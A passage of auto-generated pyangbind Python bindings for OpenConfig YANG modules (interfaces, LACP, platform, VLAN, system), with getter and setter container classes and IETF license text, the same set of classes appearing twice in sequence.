Redistribution and use in source and binary forms, with or without
modification, is permitted pursuant to, and subject to the license
terms contained in, the Simplified BSD License set forth in
Section 4.c of the IETF Trust's Legal Provisions Relating
to IETF Documents (http://trustee.ietf.org/license-info).
"""
__slots__ = ('_path_helper', '_extmethods', '__interfaces',)
_yang_name = 'openconfig-interfaces'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__interfaces = YANGDynClass(base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_interfaces(self):
"""
Getter method for interfaces, mapped from YANG variable /interfaces (container)
YANG Description: Top level container for interfaces, including configuration
and state data.
"""
return self.__interfaces
def _set_interfaces(self, v, load=False):
"""
Setter method for interfaces, mapped from YANG variable /interfaces (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_interfaces is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interfaces() directly.
YANG Description: Top level container for interfaces, including configuration
and state data.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interfaces must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)""",
})
self.__interfaces = t
if hasattr(self, '_set'):
self._set()
def _unset_interfaces(self):
self.__interfaces = YANGDynClass(base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)
interfaces = __builtin__.property(_get_interfaces, _set_interfaces)
_pyangbind_elements = OrderedDict([('interfaces', interfaces), ])
class openconfig_if_ip(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-if-ip - based on the path /openconfig-if-ip. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This model defines data for managing configuration and
operational state on IP (IPv4 and IPv6) interfaces.
This model reuses data items defined in the IETF YANG model for
interfaces described by RFC 7277 with an alternate structure
(particularly for operational state data) and with
additional configuration items.
Portions of this code were derived from IETF RFC 7277.
Please reproduce this note if possible.
IETF code is subject to the following copyright and license:
Copyright (c) IETF Trust and the persons identified as authors of
the code.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, is permitted pursuant to, and subject to the license
terms contained in, the Simplified BSD License set forth in
Section 4.c of the IETF Trust's Legal Provisions Relating
to IETF Documents (http://trustee.ietf.org/license-info).
"""
_pyangbind_elements = {}
from . import lacp
class openconfig_lacp(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-lacp - based on the path /openconfig-lacp. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module describes configuration and operational state
data for Link Aggregation Control Protocol (LACP) for
managing aggregate interfaces. It works in conjunction with
the OpenConfig interfaces and aggregate interfaces models.
"""
__slots__ = ('_path_helper', '_extmethods', '__lacp',)
_yang_name = 'openconfig-lacp'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__lacp = YANGDynClass(base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_lacp(self):
"""
Getter method for lacp, mapped from YANG variable /lacp (container)
YANG Description: Configuration and operational state data for LACP protocol
operation on the aggregate interface
"""
return self.__lacp
def _set_lacp(self, v, load=False):
"""
Setter method for lacp, mapped from YANG variable /lacp (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_lacp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lacp() directly.
YANG Description: Configuration and operational state data for LACP protocol
operation on the aggregate interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lacp must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)""",
})
self.__lacp = t
if hasattr(self, '_set'):
self._set()
def _unset_lacp(self):
self.__lacp = YANGDynClass(base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)
lacp = __builtin__.property(_get_lacp, _set_lacp)
_pyangbind_elements = OrderedDict([('lacp', lacp), ])
from . import components
class openconfig_platform(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform - based on the path /openconfig-platform. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines a data model for representing a system
component inventory, which can include hardware or software
elements arranged in an arbitrary structure. The primary
relationship supported by the model is containment, e.g.,
components containing subcomponents.
It is expected that this model reflects every field replacable
unit on the device at a minimum (i.e., additional information
may be supplied about non-replacable components).
Every element in the inventory is termed a 'component' with each
component expected to have a unique name and type, and optionally
a unique system-assigned identifier and FRU number. The
uniqueness is guaranteed by the system within the device.
Components may have properties defined by the system that are
modeled as a list of key-value pairs. These may or may not be
user-configurable. The model provides a flag for the system
to optionally indicate which properties are user configurable.
Each component also has a list of 'subcomponents' which are
references to other components. Appearance in a list of
subcomponents indicates a containment relationship as described
above. For example, a linecard component may have a list of
references to port components that reside on the linecard.
This schema is generic to allow devices to express their own
platform-specific structure. It may be augmented by additional
component type-specific schemas that provide a common structure
for well-known component types. In these cases, the system is
expected to populate the common component schema, and may
optionally also represent the component and its properties in the
generic structure.
The properties for each component may include dynamic values,
e.g., in the 'state' part of the schema. For example, a CPU
component may report its utilization, temperature, or other
physical properties. The intent is to capture all platform-
specific physical data in one location, including inventory
(presence or absence of a component) and state (physical
attributes or status).
"""
__slots__ = ('_path_helper', '_extmethods', '__components',)
_yang_name = 'openconfig-platform'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__components = YANGDynClass(base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_components(self):
"""
Getter method for components, mapped from YANG variable /components (container)
YANG Description: Enclosing container for the components in the system.
"""
return self.__components
def _set_components(self, v, load=False):
"""
Setter method for components, mapped from YANG variable /components (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_components is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_components() directly.
YANG Description: Enclosing container for the components in the system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """components must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)""",
})
self.__components = t
if hasattr(self, '_set'):
self._set()
def _unset_components(self):
self.__components = YANGDynClass(base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)
components = __builtin__.property(_get_components, _set_components)
_pyangbind_elements = OrderedDict([('components', components), ])
class openconfig_platform_linecard(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform-linecard - based on the path /openconfig-platform-linecard. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines data related to LINECARD components in
the openconfig-platform model
"""
_pyangbind_elements = {}
class openconfig_platform_port(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform-port - based on the path /openconfig-platform-port. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines data related to PORT components in the
openconfig-platform model
"""
_pyangbind_elements = {}
class openconfig_platform_transceiver(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform-transceiver - based on the path /openconfig-platform-transceiver. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines configuration and operational state data
for transceivers (i.e., pluggable optics). The module should be
used in conjunction with the platform model where other
physical entity data are represented.
In the platform model, a component of type=TRANSCEIVER is
expected to be a subcomponent of a PORT component. This
module defines a concrete schema for the associated data for
components with type=TRANSCEIVER.
"""
_pyangbind_elements = {}
class openconfig_vlan(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-vlan - based on the path /openconfig-vlan. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines configuration and state variables for VLANs,
in addition to VLAN parameters associated with interfaces
"""
_pyangbind_elements = {}
from . import system
class openconfig_system(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-system - based on the path /openconfig-system. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Model for managing system-wide services and functions on
network devices.
Portions of this code were derived from IETF RFC 7317.
Please reproduce this note if possible.
IETF code is subject to the following copyright and license:
Copyright (c) IETF Trust and the persons identified as authors of
the code.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, is permitted pursuant to, and subject to the license
terms contained in, the Simplified BSD License set forth in
Section 4.c of the IETF Trust's Legal Provisions Relating
to IETF Documents (http://trustee.ietf.org/license-info).
"""
__slots__ = ('_path_helper', '_extmethods', '__system',)
_yang_name = 'openconfig-system'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__system = YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_system(self):
"""
Getter method for system, mapped from YANG variable /system (container)
YANG Description: Enclosing container for system-related configuration and
operational state data
"""
return self.__system
def _set_system(self, v, load=False):
"""
Setter method for system, mapped from YANG variable /system (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_system is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_system() directly.
YANG Description: Enclosing container for system-related configuration and
operational state data
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """system must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)""",
})
self.__system = t
if hasattr(self, '_set'):
self._set()
def _unset_system(self):
self.__system = YANGDynClass(base=system.system, is_container='container', yang_name="system", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='container', is_config=True)
system = __builtin__.property(_get_system, _set_system)
_pyangbind_elements = OrderedDict([('system', system), ])
from . import interfaces
class openconfig_interfaces(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-interfaces - based on the path /openconfig-interfaces. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Model for managing network interfaces and subinterfaces. This
module also defines convenience types / groupings for other
models to create references to interfaces:
base-interface-ref (type) - reference to a base interface
interface-ref (grouping) - container for reference to a
interface + subinterface
interface-ref-state (grouping) - container for read-only
(opstate) reference to interface + subinterface
This model reuses data items defined in the IETF YANG model for
interfaces described by RFC 7223 with an alternate structure
(particularly for operational state data) and with
additional configuration items.
Portions of this code were derived from IETF RFC 7223.
Please reproduce this note if possible.
IETF code is subject to the following copyright and license:
Copyright (c) IETF Trust and the persons identified as authors of
the code.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, is permitted pursuant to, and subject to the license
terms contained in, the Simplified BSD License set forth in
Section 4.c of the IETF Trust's Legal Provisions Relating
to IETF Documents (http://trustee.ietf.org/license-info).
"""
__slots__ = ('_path_helper', '_extmethods', '__interfaces',)
_yang_name = 'openconfig-interfaces'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__interfaces = YANGDynClass(base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_interfaces(self):
"""
Getter method for interfaces, mapped from YANG variable /interfaces (container)
YANG Description: Top level container for interfaces, including configuration
and state data.
"""
return self.__interfaces
def _set_interfaces(self, v, load=False):
"""
Setter method for interfaces, mapped from YANG variable /interfaces (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_interfaces is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interfaces() directly.
YANG Description: Top level container for interfaces, including configuration
and state data.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interfaces must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)""",
})
self.__interfaces = t
if hasattr(self, '_set'):
self._set()
def _unset_interfaces(self):
self.__interfaces = YANGDynClass(base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)
interfaces = __builtin__.property(_get_interfaces, _set_interfaces)
_pyangbind_elements = OrderedDict([('interfaces', interfaces), ])
class openconfig_if_ip(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-if-ip - based on the path /openconfig-if-ip. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This model defines data for managing configuration and
operational state on IP (IPv4 and IPv6) interfaces.
This model reuses data items defined in the IETF YANG model for
interfaces described by RFC 7277 with an alternate structure
(particularly for operational state data) and with
additional configuration items.
Portions of this code were derived from IETF RFC 7277.
Please reproduce this note if possible.
IETF code is subject to the following copyright and license:
Copyright (c) IETF Trust and the persons identified as authors of
the code.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, is permitted pursuant to, and subject to the license
terms contained in, the Simplified BSD License set forth in
Section 4.c of the IETF Trust's Legal Provisions Relating
to IETF Documents (http://trustee.ietf.org/license-info).
"""
_pyangbind_elements = {}
from . import lacp
class openconfig_lacp(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-lacp - based on the path /openconfig-lacp. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module describes configuration and operational state
data for Link Aggregation Control Protocol (LACP) for
managing aggregate interfaces. It works in conjunction with
the OpenConfig interfaces and aggregate interfaces models.
"""
__slots__ = ('_path_helper', '_extmethods', '__lacp',)
_yang_name = 'openconfig-lacp'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__lacp = YANGDynClass(base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_lacp(self):
"""
Getter method for lacp, mapped from YANG variable /lacp (container)
YANG Description: Configuration and operational state data for LACP protocol
operation on the aggregate interface
"""
return self.__lacp
def _set_lacp(self, v, load=False):
"""
Setter method for lacp, mapped from YANG variable /lacp (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_lacp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lacp() directly.
YANG Description: Configuration and operational state data for LACP protocol
operation on the aggregate interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lacp must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)""",
})
self.__lacp = t
if hasattr(self, '_set'):
self._set()
def _unset_lacp(self):
self.__lacp = YANGDynClass(base=lacp.lacp, is_container='container', yang_name="lacp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/lacp', defining_module='openconfig-lacp', yang_type='container', is_config=True)
lacp = __builtin__.property(_get_lacp, _set_lacp)
_pyangbind_elements = OrderedDict([('lacp', lacp), ])
from . import components
class openconfig_platform(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform - based on the path /openconfig-platform. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines a data model for representing a system
component inventory, which can include hardware or software
elements arranged in an arbitrary structure. The primary
relationship supported by the model is containment, e.g.,
components containing subcomponents.
It is expected that this model reflects every field replacable
unit on the device at a minimum (i.e., additional information
may be supplied about non-replacable components).
Every element in the inventory is termed a 'component' with each
component expected to have a unique name and type, and optionally
a unique system-assigned identifier and FRU number. The
uniqueness is guaranteed by the system within the device.
Components may have properties defined by the system that are
modeled as a list of key-value pairs. These may or may not be
user-configurable. The model provides a flag for the system
to optionally indicate which properties are user configurable.
Each component also has a list of 'subcomponents' which are
references to other components. Appearance in a list of
subcomponents indicates a containment relationship as described
above. For example, a linecard component may have a list of
references to port components that reside on the linecard.
This schema is generic to allow devices to express their own
platform-specific structure. It may be augmented by additional
component type-specific schemas that provide a common structure
for well-known component types. In these cases, the system is
expected to populate the common component schema, and may
optionally also represent the component and its properties in the
generic structure.
The properties for each component may include dynamic values,
e.g., in the 'state' part of the schema. For example, a CPU
component may report its utilization, temperature, or other
physical properties. The intent is to capture all platform-
specific physical data in one location, including inventory
(presence or absence of a component) and state (physical
attributes or status).
"""
__slots__ = ('_path_helper', '_extmethods', '__components',)
_yang_name = 'openconfig-platform'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__components = YANGDynClass(base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_components(self):
"""
Getter method for components, mapped from YANG variable /components (container)
YANG Description: Enclosing container for the components in the system.
"""
return self.__components
def _set_components(self, v, load=False):
"""
Setter method for components, mapped from YANG variable /components (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_components is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_components() directly.
YANG Description: Enclosing container for the components in the system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """components must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)""",
})
self.__components = t
if hasattr(self, '_set'):
self._set()
def _unset_components(self):
self.__components = YANGDynClass(base=components.components, is_container='container', yang_name="components", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/platform', defining_module='openconfig-platform', yang_type='container', is_config=True)
components = __builtin__.property(_get_components, _set_components)
_pyangbind_elements = OrderedDict([('components', components), ])
class openconfig_platform_linecard(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform-linecard - based on the path /openconfig-platform-linecard. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines data related to LINECARD components in
the openconfig-platform model
"""
_pyangbind_elements = {}
class openconfig_platform_port(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform-port - based on the path /openconfig-platform-port. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines data related to PORT components in the
openconfig-platform model
"""
_pyangbind_elements = {}
class openconfig_platform_transceiver(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-platform-transceiver - based on the path /openconfig-platform-transceiver. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines configuration and operational state data
for transceivers (i.e., pluggable optics). The module should be
used in conjunction with the platform model where other
physical entity data are represented.
In the platform model, a component of type=TRANSCEIVER is
expected to be a subcomponent of a PORT component. This
module defines a concrete schema for the associated data for
components with type=TRANSCEIVER.
"""
_pyangbind_elements = {}
class openconfig_vlan(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-vlan - based on the path /openconfig-vlan. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This module defines configuration and state variables for VLANs,
in addition to VLAN parameters associated with interfaces
"""
_pyangbind_elements = {}
from . import system
class openconfig_system(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-system - based on the path /openconfig-system. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Model for managing system-wide services and functions on
network devices.
